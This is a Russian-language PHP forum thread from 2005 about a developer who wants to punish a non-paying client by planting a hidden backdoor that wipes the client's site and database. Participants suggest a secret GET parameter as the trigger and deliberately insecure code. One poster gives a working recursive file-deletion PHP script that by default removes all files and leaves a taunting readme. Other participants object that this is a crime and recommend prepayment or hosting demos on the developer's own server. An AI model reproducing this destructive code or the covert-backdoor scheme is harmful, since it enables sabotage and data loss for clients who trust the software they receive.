|
|
|
| Возникла идея написать скрипт, который в указанную дату затирает свое содержимое, этакая демо-версия, зашифрованая Зендом))))
такое возможно что бы скрипт сам себя затирал? | |
|
|
|
|
|
|
|
для: Гость
(04.08.2005 в 16:01)
| | Конечно, это осуществляется так же как удаление любого другого файла, при помощи функции unlink(). | |
|
|
|
|
|
|
|
| | Я думал об этом :) Только во определенное время удаление этоне совсем то :)
Вот мне заказали скрипт, есть договоренность, что оплатит после проверки, но клиент скрипт забрал, но не оплатил. Вот "бэкдор" и пригодиться. Запускаешь скрипт и он рекурсивно удаляет файлы. И затерает БД :) Вот это я понемаю защита :) | |
|
|
|
|
|
|
|
для: Akira
(04.08.2005 в 17:15)
| | Ну так у клиента же остается копия:) Не дурак же, просечет в чем дело... | |
|
|
|
|
|
|
|
для: Loki
(04.08.2005 в 17:33)
| | Просечет, но не сразу, этак после 3-го востановления БД :))) | |
|
|
|
|
|
|
|
(04.08.2005 в 17:33)
| | Просечет, но не сразу, этак после 3-го востановления БД :))) | |
|
|
|
|
|
|
|
(04.08.2005 в 17:15)
| | Если чесно то мне нужно как раз с этой целью :))) | |
|
|
|
|
|
|
|
(04.08.2005 в 17:41)
| | я бы, скорее, оставил дырку типа переменной $eto_takaya_strashnaya_peremennaya которую человек в здравом уме не задействует, а при необходимости можно ее передать через GET: index.php?eto_takaya_strashnaya_peremennaya=1 и понеслась... Вот только не попадают ли подобные действия под статью?:) | |
|
|
|
|
|
|
|
(04.08.2005 в 17:51)
| | Неа , так как не кто не чего не ломает и несанкционированного доступа не осуществляет. Вы же не нарушаете закон когда добавляете сообщение на форум? Ведь это подрузомевает сам скрипт :) И потом, к заказчику применяються меры за нарушения договора. И потом - этот вариант как последние китайское предупреждение. | |
|
|
|
|
|
|
|
(04.08.2005 в 17:41)
| | Время выполнения рекурсии 7 сек несколько тысячь файлов. Примерно за 5 сек. скрипт уничтожит все в папке. Да и заказчику необязательно высылать в архиве. И для того, что бы найти бэкдор надо будет искать кодера :) | |
|
|
|
|
|
|
|
(04.08.2005 в 17:53)
| |
<?
function gettime()
{
$part_time = explode (' ', microtime());
$real_time = $part_time[1].substr($part_time[0],1);
return $real_time;
}
function destroy($dirname)
{
GLOBAL $extentions, $count;
# Если путь пустой, то используем текущий каталог
empty($dirname) ? $dirname = "*" : $dirname = $dirname."/*";
$dir = glob($dirname);
// Если директория существует обходим.
if ($dir)
{
foreach($dir as $filename)
{
if (is_file($filename))
{
// Расширение файла
$ext=strrchr($filename, ".");
foreach($extentions as $exten)
// Если файл попадает под маску,то удоляем файл
if(preg_match($exten, $ext))
{
unlink($filename);
}
}
if (is_dir($filename))
{
destroy($filename);
}
}
}
}
// Имя корневой директории проекта
$dirname = "";
// Массив с расширениями файлов, для которых следует удалить
$extentions = array("##i");
// $extentions = array("#\.cpp#i","#\.h#i");
// Вызов функции, осуществляющей рекурсивный спуск по подкаталогам
// корневого каталога
$start = gettime();
destroy($dirname);
$stop = gettime();
$dif = "destroy - ".bcsub($stop,$start,6);
// Записываем в файл сообщение
file_put_contents("readme.txt","Astalavista Baby!");
echo $dif;
?>
|
Вот слегка переделал скрипт подсчета строк :) Теперь легким вызовом функции, с сайта исчезнут все указанные файлы. Вот папки нет. :) Кстати можно запрограммировать на удаление только бэкапа :) или архива. Главное указать расширение файла. Кстати скрипт после выполнения самоуничтожаеться, если указано расширение пхп :) | |
|
|
|
|
|
|
|
(04.08.2005 в 18:20)
| | А вообще берите предоплату :))) | |
|
|
|
|
|
|
|
для: Евгений Петров
(04.08.2005 в 19:49)
| | Так ведь дают только 50% :)) | |
|
|
|
|
|
|
|
(04.08.2005 в 19:59)
| | А вы им пол скрипта в конце пришлите, а остальное после полной оплаты. Так сказать демо версия. Или можно выложить куда нибудь на бесплатный хостинг например, чтоб он посмотрел, а когда оплатит, тогда выслать скрипт.
А вообще если сказал и не заплатил, то и хрен с ним, не обеднеете, а он к вам уже не обратится, а может у вас лучше и дешевле чем у других было? | |
|
|
|
|
|
|
|
(04.08.2005 в 20:01)
| | Мы обычно на своём сервере демонстрируем заказчику скрипт. Он тестирует его на нём. И только после полной оплаты (50% + уже полученые 50%), ему высылаются дистрибы. | |
|
|
|
|
|
|
|
для: [CHOL]Scorpion
(04.08.2005 в 20:29)
| | Ну мало ли , что произойдет? Может он его кому то перепродаст :) В любом случаем "бэкдор" лишние чувство безопастности. И потом этот скрипт не только для подлянки.
Мне например часто надо удалить файлы с хоста, а через фтп долго :) Правда этот скрипт не удоляет, папки :) но их удалить легче.
Еще можно удолять только "tmp" или мусор другой. | |
|
|
|
|
|
|
|
(04.08.2005 в 20:37)
| | 2 Akira >>
Боюсь что елси ты например решишь сделать подлянку нерадивому заказчику, твоё затирание будет преследоваться по закону. Так или иначе, это несанкционированное проникновение в закрытые части ресурса. А то что дискать раз простым запросом выполняется и поэтому типа законно, это, извините чушь. Это просто дырка, причём оставленная злонамерено. При этом действия по уничтожению какой-либо части сайта недобросовестному заказчику, который не заплатил, будет рассматриваться вовсе не как действия по восстановлению своего нарушеного права, а именно как преступление.
Конечно, данный вопрос дискуссионный. И мнений тут существует масса. Всё зависит от позиции с которой подходить.
Я всёже стою на том, что нельзя ломать сайт злонамерено оставленой дыркой. Как бы это ни было печально и для меня как разработчика.
Ну и напоследок, хочу сказать, что я в правовых вопросах немного понимаю всёже :) юрфак есть юрфак. | |
|
|
|
|
|
|
|
| | За 50 % процентов оплаты высылайте клиенту версию со всевозможными дырами. Т.е. банально не проверять данные получаемые от пользователей и т.д. Вам даже самим не надо будет ломать этот сайт. | |
|
|
|
|
|
|
|
для: Trunk
(04.08.2005 в 23:56)
| | Угу, клиент проверит приложение обнаружит кучу дыр и откажется от дальнейшего сотрудничества :))) | |
|
|
|
|
|
|
|
для: cheops
(05.08.2005 в 00:08)
| | Просто предупредить клиента , что в случае нарушения договра скрипт будет уничтожен. и вообще эту дыру можно замаскировать :) и после получения денег выдать клиенту заплатку.
Есть конечно вариант, что клиент наймет кого то, что бы найти "бэкдор". | |
|
|
|
|
|
|
|
(05.08.2005 в 00:27)
| | Я бы на месте клиента отказался от дальнейшей работы, так как нет вероятности, что такой разработчик не оставит парачку чёрных ходов про запас, а потом воспользуется или продаст этот ход, или его найдёт совершенно посторонний человек - короче не стал бы рисковать. | |
|
|
|
|
|
|
|
(05.08.2005 в 00:32)
| | если клиент не заслуживает доверия, то нет смысла ему доверять. | |
|
|
|
|
|
|
|
(05.08.2005 в 00:45)
| | Тогда и дело не будет сделано. Ведь большая половина Web-разработчиков имеет свои хосты - демонстрация проделанной работы на своём хостинге идеальный вариант. Заказчик прекрасно понимает, что после проплаты вы отдадите ему скрипт - вам то он зачем. Мы и многие другие работаем именно по такой схеме.
С ПО тоже всё просто - можно демонстрировать результаты заказчику на своём ноут-буке. | |
|
|
|
|
|
|
|
(05.08.2005 в 00:32)
| | Не надо дыры делать, можно просто не все сделать (так сказать демо-версию сделать), и сказать ему об этом, а после полной оплаты выслать ему остальное. | |
|
|
|
|
|
|
|
(05.08.2005 в 01:36)
| | В приложениях с открытым кодом сложно что-то недоделать. В том смысле что найдётся потом сотня программистов которым бабки ну очень нжны, и по их меркам им хватит и в половину меньше взял бы ты. Так что твой скрипт доделают :(
Так что, ИМХО:
1. составляйте письменный договор и оговаривайте в нём условия.
2. хостите скрипт у себя. До полного принятия работы по укту приёма-передачи никаких скриптов никому не давать. | |
|
|
|
|
|
|
|
для: [CHOL]Scorpion
(05.08.2005 в 05:13)
| | К вопросу о защите, что никто не пробовал компилировать PHP код ?
Поищите в яндексе PHPCompiler | |
|
|
|
|
|
|
|
для: Duran
(05.08.2005 в 09:07)
| | 2Duran:
скачал я эту прогу только что,
скомпилировал index.php , получил index.exe
а дальше что? как запустить то....? | |
|
|
|
|
|
|
|
для: method
(05.08.2005 в 11:13)
| | :-))))))))
Если консольное приложение, запускаете сеанс MS-DOS .... и из него запускаете ваш экзешник :-)
Вещи типа HELLO WORLD пойдут на ура :-)
Если серьездно, я сам не разбирался, скачал кадато, так же скомпилировал - с консольном режиме работает... и забросил. По сути с ним (с экзешником) можно работать как с файлом PHP - передавать ему параметры.
Нужон мозговой штурм :-).
Кто еще желает присоединиться ? | |
|
|
|
|
|
|
|
для: duran
(05.08.2005 в 13:21)
| | >Кто еще желает присоединиться ?
Недавно что-то подобное обсуждали в теме по ссылке http://www.softtime.ru/forum/read.php?id_forum=1&id_theme=2634 | |
|
|
|